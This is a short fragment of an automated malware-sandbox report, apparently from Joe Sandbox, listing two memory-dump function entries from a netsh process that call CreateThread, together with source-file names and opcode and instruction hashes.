• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BF050,?,?,00000000), ref: 030C91EC
Memory Dump Source
• Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 06be944055373b887599a832d9ffb7d2b2cc06b113b2fec72433bf1fd4ebb6a3
• Instruction ID: 76d0c51af204607b3b67a5bbfa3108190c990dc2eb7839eecb80c556585fe0e2
• Opcode Fuzzy Hash: 06be944055373b887599a832d9ffb7d2b2cc06b113b2fec72433bf1fd4ebb6a3
• Instruction Fuzzy Hash: 5041AC76611785ABD768DF74C881FEBB3A8BF84740F44051DF5299B280DB70B921CBA4
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,030BF050,?,?,00000000), ref: 030C91EC
Memory Dump Source
• Source File: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_30b0000_netsh.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
• Instruction ID: cc1da9e6e0038eb073493eed56ec064942ee035510ebf31c403b211e3c5528c9
• Opcode Fuzzy Hash: fae906c78181de7630efb0e23d798c80b6ead711412a0b26827c401ed9c2da1b
• Instruction Fuzzy Hash: 69E06D373913043AE220A699AC02FEBB29C9B81B60F15002AFA0DEA2C0D995F40142A5